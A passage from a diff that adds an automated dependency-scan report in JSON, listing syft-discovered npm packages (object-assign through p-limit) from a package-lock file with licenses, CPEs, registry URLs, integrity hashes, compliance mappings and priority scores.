], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bb2a72a38fc8e367", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: object-assign 4.1.1", + "title": "object-assign 4.1.1", + "description": "Package discovered: object-assign 4.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d7b65c8670c0c943", + "name": "object-assign", + "version": "4.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:object-assign:object-assign:4.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object-assign:object_assign:4.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object_assign:object-assign:4.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object_assign:object_assign:4.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object:object-assign:4.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object:object_assign:4.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/object-assign@4.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", + "integrity": "sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7280439ae019eb34", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: object-hash 3.0.0", + "title": "object-hash 3.0.0", + "description": "Package discovered: object-hash 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f0415e28bd0fa73d", + "name": "object-hash", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:object-hash:object-hash:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object-hash:object_hash:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object_hash:object-hash:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object_hash:object_hash:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object:object-hash:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object:object_hash:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/object-hash@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", + "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "570f098417dfedef", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: object-inspect 1.13.4", + "title": "object-inspect 1.13.4", + "description": "Package discovered: object-inspect 1.13.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "67701f4036faa68d", + "name": "object-inspect", + "version": "1.13.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:object-inspect:object-inspect:1.13.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object-inspect:object_inspect:1.13.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object_inspect:object-inspect:1.13.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object_inspect:object_inspect:1.13.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object:object-inspect:1.13.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:object:object_inspect:1.13.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/object-inspect@1.13.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz", + "integrity": "sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "276b1e3a3b3501f5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: on-finished 2.3.0", + "title": "on-finished 2.3.0", + "description": "Package discovered: on-finished 2.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3329ff372baa3c68", + "name": "on-finished", + "version": "2.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:on-finished:on-finished:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on-finished:on_finished:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on_finished:on-finished:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on_finished:on_finished:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on:on-finished:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on:on_finished:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/on-finished@2.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz", + "integrity": "sha512-ikqdkGAAyf/X/gPhXGvfgAytDZtDbr+bkNUJ0N9h5MI/dmdgCs3l6hoHrcUv41sRKew3jIwrp4qQDXiK99Utww==", + "dependencies": { + "ee-first": "1.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1ede69e18336ab8f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: on-finished 2.4.1", + "title": "on-finished 2.4.1", + "description": "Package discovered: on-finished 2.4.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9c42ff2fa50e9c68", + "name": "on-finished", + "version": "2.4.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:on-finished:on-finished:2.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on-finished:on_finished:2.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on_finished:on-finished:2.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on_finished:on_finished:2.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on:on-finished:2.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on:on_finished:2.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/on-finished@2.4.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "01ce9d2b89e4c438", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: on-headers 1.1.0", + "title": "on-headers 1.1.0", + "description": "Package discovered: on-headers 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c535b114447926f1", + "name": "on-headers", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:on-headers:on-headers:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on-headers:on_headers:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on_headers:on-headers:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on_headers:on_headers:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on:on-headers:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:on:on_headers:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/on-headers@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/on-headers/-/on-headers-1.1.0.tgz", + "integrity": "sha512-737ZY3yNnXy37FHkQxPzt4UZ2UWPWiCZWLvFZ4fu5cueciegX0zGPnrlY6bwRg4FdQOe9YU8MkmJwGhoMybl8A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bd9248df9b4e52cf", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: once 1.4.0", + "title": "once 1.4.0", + "description": "Package discovered: once 1.4.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3f85171a571bc28a", + "name": "once", + "version": "1.4.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:once:once:1.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/once@1.4.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dependencies": { + "wrappy": "1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "92e0060edd98f736", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: otplib 12.0.1", + "title": "otplib 12.0.1", + "description": "Package discovered: otplib 12.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7b45ff9710a4aaac", + "name": "otplib", + "version": "12.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:otplib:otplib:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/otplib@12.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz", + "integrity": "sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/preset-default": "^12.0.1", + "@otplib/preset-v11": "^12.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1061878b64866643", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: p-limit 2.3.0", + "title": "p-limit 2.3.0", + "description": "Package discovered: p-limit 2.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c6cc7a145d3e597c", + "name": "p-limit", + "version": "2.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": 